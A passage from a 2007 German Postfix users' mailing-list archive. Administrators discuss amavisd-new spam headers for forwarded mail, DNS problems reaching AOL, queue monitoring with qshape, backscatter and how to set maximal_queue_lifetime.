http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From mrg at unimx.de Thu Nov 22 02:29:17 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 02:29:17 +0100 Subject: [Postfixbuch-users] =?windows-1252?q?Spamassassin_/amavisd-new=29?= =?windows-1252?q?_X-Spam-*_Header_f=FCr_non_local_users_=28recipie?= =?windows-1252?q?nts/empfaenger=29?= Message-ID: <0dc901c82ca7$196c07d0$4c441770$@de> Hallo, noch eine Frage. Versuche seit Stunden amavisd-new / Spamassassin dazu zu bringen, Mails mit einem X-Spam-Scanned (oder ähnliche Header) zu versehen. Klappt für Mails die final an lokal gehen auch super. Aber für Domains die z.B. durch Weiterleitung das System passieren, fügt amavisd-new nur X-Virus-Scanned hinzu. (Auszug hash virtual-users vom postix): adresse at domain.tld umleitung at domain.tld b at domain.tld postfachname at MYHOST Die Tag Level stimmen und werden laut LOG auch angesprochen (klappt bei einer Mail an b at domain.tld auch super). LOG: lookup (local_domains) => true, " postfachname at MYHOST " matches Aber: Bei Mails die an extern (nicht an ein Postfach) gehen werden die X-Spam-* Header nicht geschrieben: LOG: lookup (local_domains) => undef, " umleitung at domain.tld" does not match Hoffe das kann man ändern? Habe ich was übersehen, oder warum ist das so? Sollen doch die Weiterleitungsziele gleich wissen, dass die Mail durch einen Spamcheck ging. Amavisd.conf: $remove_existing_spam_headers = 0; $remove_existing_x_scanned_headers = 0; $sa_spam_modifies_subj = 1; $sa_spam_report_header = 1; Dank euch erneut. Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From mailing-postfixbuch at schoenhaber.de Thu Nov 22 02:46:53 2007 From: mailing-postfixbuch at schoenhaber.de (=?UTF-8?B?TWFya3VzIFNjaMO2bmhhYmVy?=) Date: Thu, 22 Nov 2007 02:46:53 +0100 Subject: [Postfixbuch-users] =?utf-8?q?Spamassassin_/amavisd-new=29_X-Spam?= =?utf-8?q?-*_Header_f=C3=BCr_non_local_users_=28recipients/empfaenger=29?= In-Reply-To: <0dc901c82ca7$196c07d0$4c441770$@de> References: <0dc901c82ca7$196c07d0$4c441770$@de> Message-ID: <4744DF8D.5040809@schoenhaber.de> mrg at unimx.de schrieb: > Versuche seit Stunden amavisd-new / Spamassassin dazu zu bringen, Mails mit > einem X-Spam-Scanned (oder ähnliche Header) zu versehen. > > Klappt für Mails die final an lokal gehen auch super. > > > > Aber für Domains die z.B. durch Weiterleitung das System passieren, fügt > amavisd-new nur X-Virus-Scanned hinzu. Schau Dir mal @local_domains_maps an. Gruß mks From mrg at unimx.de Thu Nov 22 03:02:54 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 22 Nov 2007 03:02:54 +0100 Subject: [Postfixbuch-users] =?windows-1252?q?Spamassassin_/amavisd-new=29?= =?windows-1252?q?_X-Spam-*_Header_f=FCr_non_local_users_=28recipie?= =?windows-1252?q?nts/empfaenger=29?= In-Reply-To: <0dc901c82ca7$196c07d0$4c441770$@de> References: <0dc901c82ca7$196c07d0$4c441770$@de> Message-ID: <0df801c82cab$cbde4370$639aca50$@de> So endlich habe ich es geschafft J Einfach im amavisd_new die local_domains_maps auf ALLE gesetzt. Nun ist die Frage ob dies schlimm ist und welche Konsequenzen dies hat? amavisd-new wertet nun alle Domain als LOKAL: LOG: lookup (local_domains) => true, " irgendeine at domain.tld " matches Dürfte ja egal sein. Nur warum gibt es diese Unterscheidung überhaupt (das macht mich etwas unruhig)? Jedenfalls wurden meine Testmails erfolgreich zugestellt und auch mit dem X-Spam-* Headern versehen. Grüße -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From ml at awinkelmann.de Thu Nov 22 07:08:37 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 07:08:37 +0100 Subject: [Postfixbuch-users] CRAM-MD5-Authentifizierung bei authdaemond klappt nicht In-Reply-To: <47449FFB.4050305@michawinter.de> References: <474369CD.60401@michawinter.de> <200711210630.48950.ml@awinkelmann.de> <47449FFB.4050305@michawinter.de> Message-ID: <200711220708.37736.ml@awinkelmann.de> On Mittwoch, 21. November 2007, Michael Winter wrote: > > Das ist sicher schon hunderte male durch alle Listen gegangen. > > Mit welchen Suchbegriffen hätte ich das gefunden? z.B. http://www.google.de/search?hl=de&q=site%3Alisti.jpberlin.de+saslauthd+authdaemond+%22-md5%22&btnG=Suche&meta= -- Andreas From ml at awinkelmann.de Thu Nov 22 07:14:10 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 22 Nov 2007 07:14:10 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <20071121222710.5e434d97@gamma.meyer.home> References: <20071121200759.7f4d5673@gamma.meyer.home> <200711212152.40288.ml@awinkelmann.de> <20071121222710.5e434d97@gamma.meyer.home> Message-ID: <200711220714.10156.ml@awinkelmann.de> On Mittwoch, 21. November 2007, Andreas Meyer wrote: > > > Nov 21 18:51:23 cherry postfix/smtp[12779]: > > > 5871082E6: to=, relay=none, delay=0.32, delays=0. > > > 18/0.13/0.01/0, dsn=5.4.4, status=bounced (Host or domain name not > > > found. Name service error for name=aol.com type=A: Host not found) > > > > Er findet keinen a-Record zu aol.com. Mal beiseite gemnommen, dass es > > merkwürdig ist, dass er das überhaupt versucht, sieht es danach aus, dass > > Du DNS-Probleme hast. Prüf das mal. Hast Du einen DNS-Server? > > Das mit dem a-Record hat mich auch verwundert. Mein Mailserver, das > unbekannte Wesen. Was veranlaßt Postfix auf einen A-Record zu prüfen? Wenn Postfix keinen MX-Record zu einer Domain findet versucht es den A-Record. > Ja, ich habe einen eigenen DNS-Server, der die Root-Server befragt. Dann prüf ihn und natürlich auch den üblichen Verdächtigen chroot. Prüf ob das eingeschaltet ist bzw. sich im chroot die richtigen Config-Dateien befindet. > > > Ein telnet hingegen funktioniert: > > > > > > # telnet mailin-02.mx.aol.com 25 > > > Trying 64.12.137.89... > > > Connected to mailin-02.mx.aol.com. > > > Escape character is '^]'. > > > 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 > > > 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do > > > not 220- authorize the use of its proprietary computers and > > > computer 220- networks to accept, transmit, or distribute > > > unsolicited bulk 220- e-mail sent from the internet. Effective > > > immediately: AOL 220- may no longer accept connections from IP > > > addresses which 220 have no reverse-DNS (PTR record) assigned. > > > ehlo anup.de > > > 250-rly-ma09.mx.aol.com cherry.anup.de > > > 250 HELP > > > quit > > > 221 SERVICE CLOSING CHANNEL > > > Connection closed by foreign host. > > > > Hast Du das mehrmals probiert? Evtl. ist was überlastet. > > mailin-02.mx.aol.com connected manchmal und manchmal schließt > er gleich wieder die Verbindung, das macht mailin-03.mx.aol.com > nicht: Evtl. einen Eintrag in der transport_maps für aol.com mit nem Pointer auf den zuverlässigen. Hmm, benutzt Du connection-caching? bzw. eine Postfix-Version die das kann? > # telnet mailin-02.mx.aol.com 25 > Trying 64.12.137.89... > Connected to mailin-02.mx.aol.com. > Escape character is '^]'. > 220-rly-ma06.mx.aol.com ESMTP mail_relay_in-ma06.7; Wed, 21 Nov 2007 > 16:18:50 -0400 220-America Online (AOL) and its affiliated companies do not > 220- authorize the use of its proprietary computers and computer > 220- networks to accept, transmit, or distribute unsolicited bulk > 220- e-mail sent from the internet. Effective immediately: AOL > 220- may no longer accept connections from IP addresses which > 220 have no reverse-DNS (PTR record) assigned. > quit > 221 SERVICE CLOSING CHANNEL > Connection closed by foreign host. > # telnet mailin-02.mx.aol.com 25 > Trying 64.12.137.168... > Connected to mailin-02.mx.aol.com. > Escape character is '^]'. > Connection closed by foreign host. -- Andreas From postfixusers at home.tom-krieger.de Thu Nov 22 08:48:17 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Thu, 22 Nov 2007 08:48:17 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Anzahl_von_Mails_in_den_Postfi?= =?iso-8859-1?q?x_queues=09/=3Fviele_warten_in_active?= In-Reply-To: <20071121141947.GJ1981@charite.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <20071121133242.GF1981@charite.de> <20071121141947.GJ1981@charite.de> Message-ID: <200711220848.19483.postfixusers@home.tom-krieger.de> Am Mi November 21 2007 schrieb Ralf Hildebrandt: > * Ralf Hildebrandt : > > * Thomas Krieger : > > > Am Mi November 21 2007 schrieb Ralf Hildebrandt: > > > > * Thomas Krieger : > > > > > watch --interval=5 "find /var/spool/postfix/active -type f | wc -l" > > > > > > > > watch --interval=5 qshape active > > > > > > richtig, wenn qshape installiert ist > > > > Das gehört doch zu Postfix dazu! > > Jedenfalls seit MINDESTENS 2 Jahren... > > 20051109 > > qshape.pl updated for extra microsecond time field in Postfix > queue files. Stimmt, das dachte ich auch. Und hatte prompt letztes WE einen Mailserver, mit drei Postfix-Instanzen, der dicke Backen machte und kein qshape installiert hatte (warum auch immer, ich habe den Hobel nicht aufgesetzt). Daher die Lösung mit dem find. Servus Thomas From mhaegele at linuxrocks.dyndns.org Thu Nov 22 09:11:10 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Thu, 22 Nov 2007 09:11:10 +0100 Subject: [Postfixbuch-users] =?windows-1252?q?Spamassassin_/amavisd-new=29?= =?windows-1252?q?_X-Spam-*_Header_f=FCr_non_local_users_=28recipients/emp?= =?windows-1252?q?faenger=29?= In-Reply-To: <0df801c82cab$cbde4370$639aca50$@de> References: <0dc901c82ca7$196c07d0$4c441770$@de> <0df801c82cab$cbde4370$639aca50$@de> Message-ID: <4745399E.3000100@linuxrocks.dyndns.org> mrg at unimx.de schrieb: > So endlich habe ich es geschafft J > > > > Einfach im amavisd_new die local_domains_maps auf ALLE gesetzt. > > > > Nun ist die Frage ob dies schlimm ist und welche Konsequenzen dies hat? Ich finds gut, dass das so einfach funktioniert. > amavisd-new wertet nun alle Domain als LOKAL: > > LOG: lookup (local_domains) => true, " irgendeine at domain.tld " matches > > > > Dürfte ja egal sein. Nur warum gibt es diese Unterscheidung überhaupt (das > macht mich etwas unruhig)? Nun ich könnte mir vorstellen dass man nicht alles was über einen Mailserver geht taggen will (z.B. Mail für andere Domains die das nicht so wollen). Kurz in die Doku schauen?: /usr/share/doc/amavisd-new/examples/amavisd.conf-sample.gz # Lookup list of local domains (see README.lookups for syntax details) # # @local_domains_maps list of lookup tables are used in deciding whether a # recipient is local or not, or in other words, if the message is outgoing # or not. This affects inserting spam-related headers for local recipients, # limiting recipient virus notifications (if enabled) to local recipients, # in deciding if address extension may be appended, and in SQL lookups # for non-fqdn addresses. Set it up correctly if you need features # that rely on this setting (or just leave empty otherwise). # # With Postfix (2.0) a quick hint on what local domains normally are: # a union of domains specified in: mydestination, virtual_alias_domains, # virtual_mailbox_domains, and relay_domains. > Grüße -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From joe at pdi-berlin.de Thu Nov 22 09:36:58 2007 From: joe at pdi-berlin.de (Joachim Schoenberg) Date: Thu, 22 Nov 2007 09:36:58 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Anzahl_von_Mails_in_den_Postfi?= =?iso-8859-1?q?x_queues=09/=3Fviele_warten_in_active?= In-Reply-To: <200711220848.19483.postfixusers@home.tom-krieger.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <20071121141947.GJ1981@charite.de> <200711220848.19483.postfixusers@home.tom-krieger.de> Message-ID: <200711220936.58962.joe@pdi-berlin.de> Am Donnerstag, 22. November 2007 schrieb Thomas Krieger: > > > > richtig, wenn qshape installiert ist > > > > > > Das gehört doch zu Postfix dazu! > > > > Jedenfalls seit MINDESTENS 2 Jahren... > > > > 20051109 > > > > qshape.pl updated for extra microsecond time field in Postfix > > queue files. > > Stimmt, das dachte ich auch. Und hatte prompt letztes WE einen Mailserver, > mit drei Postfix-Instanzen, der dicke Backen machte und kein qshape > installiert hatte ... Bei meinen Servern (SLES10) steht qshape.pl unter /usr/share/doc/packages/postfix/auxiliary/qshape/qshape.pl Da hätte ich es natürlich nie vermutet - aber es gibt ja find ;-) Joe -- ----------------------------------- Joachim Schoenberg Paul-Drude-Institut for Solid State Electronics, Berlin ----------------------------------- From usenet at deiszner.de Thu Nov 22 09:47:06 2007 From: usenet at deiszner.de (Sebastian Deiszner) Date: Thu, 22 Nov 2007 09:47:06 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails Message-ID: <4745420A.7010602@deiszner.de> Hallo zusammen, wie sieht das aus mit der Zustellzeit von Mails. Ein Nutzer hat sich bei mir beschwert, das er erst nach längeremeine Fehlermeldung über eine nicht zugestellte Mail bekommen hat. Er hat eine Mail an abcef at t-omline.de gesendet. Eigentlich war t-online.de gemeint - t-omline ist irgendein Chat...Portal - aber die haben irgendwie ihren Mailserver nicht richtig konfiguriert - da kam kein "user unknown in virtual table". Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d runtergesetzt. Meinungen ? Alternative Vorschläge - ausser das die Nutzer die Mailadressen richtig eintippen sollen ;-) gruß Sebastian From postfixbuch-users at japantest.homelinux.com Thu Nov 22 09:52:40 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Thu, 22 Nov 2007 09:52:40 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <4745420A.7010602@deiszner.de> References: <4745420A.7010602@deiszner.de> Message-ID: <47454358.4030607@japantest.homelinux.com> Sebastian Deiszner wrote: > Hallo zusammen, > > wie sieht das aus mit der Zustellzeit von Mails. > > Ein Nutzer hat sich bei mir beschwert, das er erst nach längeremeine > Fehlermeldung über eine nicht zugestellte Mail bekommen hat. > > Er hat eine Mail an abcef at t-omline.de gesendet. > > Eigentlich war t-online.de gemeint - t-omline ist irgendein > Chat...Portal - aber die haben irgendwie ihren Mailserver nicht richtig > konfiguriert - da kam kein "user unknown in virtual table". > > Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d > runtergesetzt. > > Meinungen ? > > Alternative Vorschläge - ausser das die Nutzer die Mailadressen richtig > eintippen sollen ;-) http://www.postfix.org/postconf.5.html#delay_warning_time -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From gregor at a-mazing.de Thu Nov 22 09:57:41 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 22 Nov 2007 09:57:41 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <4745420A.7010602@deiszner.de> References: <4745420A.7010602@deiszner.de> Message-ID: <200711220957.41430@office.a-mazing.net> Hallo Sebastian, Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: > Ein Nutzer hat sich bei mir beschwert, das er erst nach längeremeine > Fehlermeldung über eine nicht zugestellte Mail bekommen hat. > > Er hat eine Mail an abcef at t-omline.de gesendet. > > Eigentlich war t-online.de gemeint - t-omline ist irgendein > Chat...Portal - aber die haben irgendwie ihren Mailserver nicht richtig > konfiguriert - da kam kein "user unknown in virtual table". > > Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d > runtergesetzt. > > Meinungen ? 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch nach 5 Tagen noch nicht draußen. > Alternative Vorschläge http://www.postfix.org/postconf.5.html#delay_warning_time Steht bei mir auf 4h. Damit bekommt der User bereits nach kurzer Zeit eine Warnung, obwohl die Zustellung weiterhin versucht wird. > - ausser das die Nutzer die Mailadressen richtig eintippen sollen ;-) Mach deinen Usern klar, daß du nicht für ihre Fehler verantwortlich bist... ;-) Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From p.heinlein at heinlein-support.de Thu Nov 22 10:33:29 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Thu, 22 Nov 2007 10:33:29 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <4745420A.7010602@deiszner.de> References: <4745420A.7010602@deiszner.de> Message-ID: <200711221033.29536.p.heinlein@heinlein-support.de> Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: > Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d > runtergesetzt. > > Meinungen ? Ich empfehle grundsätzlich 3d. 5d ist für heute zu löange (Montag -> Freitag), 2d ist zu kurz (Wochenende, Wartungsarbeiten). Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From postfixusers at home.tom-krieger.de Thu Nov 22 11:14:05 2007 From: postfixusers at home.tom-krieger.de (Thomas Krieger) Date: Thu, 22 Nov 2007 11:14:05 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Anzahl_von_Mails_in_den_Postfi?= =?iso-8859-1?q?x_queues=09/=3Fviele_warten_in_active?= In-Reply-To: <200711220936.58962.joe@pdi-berlin.de> References: <086601c82c40$2ac8c930$805a5b90$@de> <200711220848.19483.postfixusers@home.tom-krieger.de> <200711220936.58962.joe@pdi-berlin.de> Message-ID: <200711221114.07667.postfixusers@home.tom-krieger.de> Am Do November 22 2007 schrieb Joachim Schoenberg: > Am Donnerstag, 22. November 2007 schrieb Thomas Krieger: > > > > > richtig, wenn qshape installiert ist > > > > > > > > Das gehört doch zu Postfix dazu! > > > > > > Jedenfalls seit MINDESTENS 2 Jahren... > > > > > > 20051109 > > > > > > qshape.pl updated for extra microsecond time field in Postfix > > > queue files. > > > > Stimmt, das dachte ich auch. Und hatte prompt letztes WE einen > > Mailserver, mit drei Postfix-Instanzen, der dicke Backen machte und kein > > qshape installiert hatte ... > > Bei meinen Servern (SLES10) steht qshape.pl unter > > /usr/share/doc/packages/postfix/auxiliary/qshape/qshape.pl > > Da hätte ich es natürlich nie vermutet - aber es gibt ja find ;-) Weder ein locate noch ein find konnten qshape auf der Maschine zu Tage fördern. Servus Thomas From peter.bauernfeind at reba-eno.de Thu Nov 22 12:04:21 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 22 Nov 2007 12:04:21 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) In-Reply-To: <0d1901c82c78$1eca2100$5c5e6300$@de> References: <0d1901c82c78$1eca2100$5c5e6300$@de> Message-ID: <47456235.9070706@reba-eno.de> mrg at unimx.de schrieb: > > Hallo, > > > > ihr seit es ev. leid antworten über Backscatter zu geben. > > Bevor ihr nölt: > > Mein Server ist durch ?smtpd-Restrictions? schon etwas gegen > Backscatter geschützt. > > Habe auch einige Howtos und Backscatter Infos gelesen die im Netz so > zu finden sind. Weiß also etwas bescheid. > > > > > > Folgendes Szenario (ist exemplarisch, lässt sich auch auf andere > BEREICHE portieren): > > > > Ein User auf meinem System sein Postfach ist voll. > > [anderer BEREICH: z.B. eine Weiterleitung eingerichtet die nicht mehr > existiert, Mails mit ?fi..en? reject , Abwesenheitsbenachtigung] > > > > > > Dieser User bekommt nun von einem geforgten Absender Spam-Post: > > > > forget at sender.tld -> > meinuser at meinedomain.de > > > > Per ?smtpd-Restrictions? ist diese Mail nicht ablehnbar, solange > forget at sender.tld tatsächlich existiert. > > > > > > Weg der Mail: > > > > SMTP -> a) Spamfilter (markiert den Header da ja Spam (keine > Vernichtung der Mail) ) -> Cyrus will einliefern an > meinuser at meinedomain.de und sieht > Postfach voll > > -> Mail wird gebounced mit Postfach voll > > > > So da haben wir den Salat. forget at sender.tld > bekommt tausende Bounce (typischer > Backscatter). > > > > Ist es nun nicht möglich, dass Mails die von > > > > MAILER-DAEMON at MYHOST (Mail Delivery System) oder Mail Sieve Subsystem > > > an jemanden geschickt werden UND! > > - im Inhalt die Spammarkierung enthalten (da ja eigentliche Mail > angehängt die gefilter wurde) > > => per Filter auf den schon vorhanden Spamheader (oder wie auch immer) > abzulehnen (oder z.B. an ein Sammelpostfach senden)? > > > > Es würden alle gebounced Mails die die Spammarkierung haben > aussortiert/wegsortiert. > > Das würde doch das Problem lösen, da nun kein Bounce auf eigentliche > Spammails gesendet wird? > > Wie kann ich das bewerkstelligen? > > > > Wie sieht der Weg einer SIEVE gefilterten Mail im Postfixsystem aus > (ist ja kein eigentlicher Bounce). > > > > Hinweis: > > Was nicht praktikabel ist, ist die Spammails unter a) nicht nur zu > markieren sondern zu löschen. Meine User wollen die Spams mir > markierung (werden dann per Sieve in Spamordner gepackt). > Dann nimm sie einfach nicht an. Einen Thread vorher schreibt AOL: 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do not 220- authorize the use of its proprietary computers and computer 220- networks to accept, transmit, or distribute unsolicited bulk 220- e-mail sent from the internet. Effective immediately: AOL 220- may no longer accept connections from IP addresses which 220 have no reverse-DNS (PTR record) assigned. Nimm Policyweight, Greylisting und ähnliches. > Auch nicht praktikabel ist so Spam im SMTP Dialog abzulehnen > (verschiedene Gründe ua. Sie oben). > > > Und wenn die Wanne voll ist, dann ist sie voll und läuft über wenn man sich dennoch reinsetzt. Deshalb vor Annahme der Mail prüfen und Annahme verweigern. War hier vor einigen Tagen ein Thema. Und bouncen ist nicht gut. Das Beste ist beim Empfang ablehnen. Dann weiß der Sender bzw der Verfasser der Mail, daß seine Mail nicht angenommen wurde, Fehlercode steht dabei. Notfalls kann der Sender immernoch zum Telefon greifen und nachfragen. Und nun etwas organisatorisches. Was du noch machen kannst, definiere zwei Mailboxfüllgrade, ab dem ersten wird der User benachrichtigt, daß seine Mailbox nur noch xx Prozent / xx MB freien Platz hat und beim zweiten wird nicht mehr angenommen. Nun frage ich mich allerdings welch wichtige Mails solange aufbewahrt werden müssen, daß sie die Mailbox verstopfen? Oder anders wieso werden die wichtigen Mails nichtgelesen? Oder wie kommt es behaupt dazu, daß die Mailbox überläuft? Das heißt doch, der User der Mailbox liest seine Mails nicht. Oder hat noch kein größeres Postfach bestellt. Aber alles interne organisatorische Sachen. Mit freundlichem Gruß Peter Bauernfeind From peter.bauernfeind at reba-eno.de Thu Nov 22 12:17:47 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 22 Nov 2007 12:17:47 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <200711220957.41430@office.a-mazing.net> References: <4745420A.7010602@deiszner.de> <200711220957.41430@office.a-mazing.net> Message-ID: <4745655B.2010208@reba-eno.de> Gregor Hermens schrieb: > Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: >> Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d >> runtergesetzt. >> >> Meinungen ? >> > > 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch nach 5 > Tagen noch nicht draußen Das halt ich für etwas knapp. Es gibt auch so blöde Ereignisse wie Feiertage. ;-) Weihnachten heuer ist toll, Sa - So - hlg.Abend (wie Sa) - 1.Weihnacht - 2.Weihnacht, das macht fünf Tage ohne volle Besetzung. Aber gut, wer will schon an Weihnachten Email haben. Mit freundlichem Gruß Peter Bauernfeind From gregor at a-mazing.de Thu Nov 22 12:34:09 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 22 Nov 2007 12:34:09 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <4745655B.2010208@reba-eno.de> References: <4745420A.7010602@deiszner.de> <200711220957.41430@office.a-mazing.net> <4745655B.2010208@reba-eno.de> Message-ID: <200711221234.09855@office.a-mazing.net> Hallo Peter, Am Donnerstag, 22. November 2007 schrieb Peter Bauernfeind: > Gregor Hermens schrieb: > > Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: > >> Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d > >> runtergesetzt. > >> > >> Meinungen ? > > > > 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch > > nach 5 Tagen noch nicht draußen > > Das halt ich für etwas knapp. Es gibt auch so blöde Ereignisse wie > Feiertage. ;-) Weihnachten heuer ist toll, Sa - So - hlg.Abend (wie Sa) > - 1.Weihnacht - 2.Weihnacht, das macht fünf Tage ohne volle Besetzung. Mit dem Argument könnte man auch sagen, viele Firmen machen von Weihnachten bis Dreikönig dicht. Soll ich deswegen maximun_queue_lifetime = 14d setzen? Irgendwo gibt es eine Grenze, und die habe ich für mich auf 3 Tage festgelegt. Ich möchte mal den User hören, der erst nach 14 Tagen ne Fehlermeldung zu einer wichtigen Mail bekommt... ;-) Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From peter.bauernfeind at reba-eno.de Thu Nov 22 12:45:49 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Thu, 22 Nov 2007 12:45:49 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <200711221234.09855@office.a-mazing.net> References: <4745420A.7010602@deiszner.de> <200711220957.41430@office.a-mazing.net> <4745655B.2010208@reba-eno.de> <200711221234.09855@office.a-mazing.net> Message-ID: <47456BED.8010706@reba-eno.de> Gregor Hermens schrieb: > Hallo Peter, > > Am Donnerstag, 22. November 2007 schrieb Peter Bauernfeind: > >> Gregor Hermens schrieb: >> >>> Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: >>> >>>> Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d >>>> runtergesetzt. >>>> >>>> Meinungen ? >>>> >>> 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch >>> nach 5 Tagen noch nicht draußen >>> >> Das halt ich für etwas knapp. Es gibt auch so blöde Ereignisse wie >> Feiertage. ;-) Weihnachten heuer ist toll, Sa - So - hlg.Abend (wie Sa) >> - 1.Weihnacht - 2.Weihnacht, das macht fünf Tage ohne volle Besetzung. >> > > Mit dem Argument könnte man auch sagen, viele Firmen machen von Weihnachten > > bis Dreikönig dicht. Soll ich deswegen maximun_queue_lifetime = 14d setzen? > > Irgendwo gibt es eine Grenze, und die habe ich für mich auf 3 Tage festgelegt. > Ich möchte mal den User hören, der erst nach 14 Tagen ne Fehlermeldung zu > einer wichtigen Mail bekommt... ;-) > Da hast du etwas misverstanden. Im Prinzip gibt es doch vier Ereignisse: 1) Die Mail wird temporär abgelehnt, mit 5xx-Fehler wird nicht weiter versucht. 2) Nach "delay_waring_time" gibt es die erste Meldung an den Sender, daß seine Mail nicht zugestellt werden konnte, es wird aber weiter versucht. 3) Auch nach der "maximal_queue_lifetime" ist die Mail nicht ausgelieert worden. 4) Der Sender erhält eine Nachricht, daß seine Mail endgültig nicht angenommen wurde/angekommen ist. Man möge mich berichtigen wenn das falsch ist. Mit freundlichem Gruß Peter Bauernfeind From gregor at a-mazing.de Thu Nov 22 13:40:54 2007 From: gregor at a-mazing.de (Gregor Hermens) Date: Thu, 22 Nov 2007 13:40:54 +0100 Subject: [Postfixbuch-users] Maximale Zustellzeit von Mails In-Reply-To: <47456BED.8010706@reba-eno.de> References: <4745420A.7010602@deiszner.de> <200711221234.09855@office.a-mazing.net> <47456BED.8010706@reba-eno.de> Message-ID: <200711221340.54381@office.a-mazing.net> Am Donnerstag, 22. November 2007 schrieb Peter Bauernfeind: > Gregor Hermens schrieb: > > Hallo Peter, > > > > Am Donnerstag, 22. November 2007 schrieb Peter Bauernfeind: > >> Gregor Hermens schrieb: > >>> Am Donnerstag, 22. November 2007 schrieb Sebastian Deiszner: > >>>> Ich hätte jetzt die maximal_queue_lifetime = 5d auf 3d oder 2d > >>>> runtergesetzt. > >>>> > >>>> Meinungen ? > >>> > >>> 3d ist imho vertretbar. Was bis dahin noch in der Queue liegt, ist auch > >>> nach 5 Tagen noch nicht draußen > >> > >> Das halt ich für etwas knapp. Es gibt auch so blöde Ereignisse wie > >> Feiertage. ;-) Weihnachten heuer ist toll, Sa - So - hlg.Abend (wie Sa) > >> - 1.Weihnacht - 2.Weihnacht, das macht fünf Tage ohne volle Besetzung. > > > > Mit dem Argument könnte man auch sagen, viele Firmen machen von > > Weihnachten bis Dreikönig dicht. Soll ich deswegen maximun_queue_lifetime > > = 14d setzen? > > > > Irgendwo gibt es eine Grenze, und die habe ich für mich auf 3 Tage > > festgelegt. Ich möchte mal den User hören, der erst nach 14 Tagen ne > > Fehlermeldung zu einer wichtigen Mail bekommt... ;-) > > Da hast du etwas misverstanden. Im Prinzip gibt es doch vier Ereignisse: > 1) Die Mail wird temporär abgelehnt, mit 5xx-Fehler wird nicht weiter > versucht. > 2) Nach "delay_waring_time" gibt es die erste Meldung an den Sender, daß > seine Mail nicht zugestellt werden konnte, es wird aber weiter versucht. > 3) Auch nach der "maximal_queue_lifetime" ist die Mail nicht ausgelieert > worden. > 4) Der Sender erhält eine Nachricht, daß seine Mail endgültig nicht > angenommen wurde/angekommen ist. Habe ich nie was anderes behauptet. Du hast nur meine erste Mail unvollständig zitiert und den Part über delay_warning_time weggelassen, was deine Weihnachtsaussage in den Context gestellt hat, daß für maximum_queue_lifetime selbst 5 Tage schon wenig sein können. Das habe ich dann überspitzt wiedergegeben. Wo haben wir uns jetzt missverstanden? Gruß, Gregor -- @mazing fon +49 8142 6528665 Gregor Hermens fax +49 8142 6528669 Brucker Strasse 12 gregor.hermens at a-mazing.de D-82216 Gernlinden http://www.a-mazing.de/ From zierke 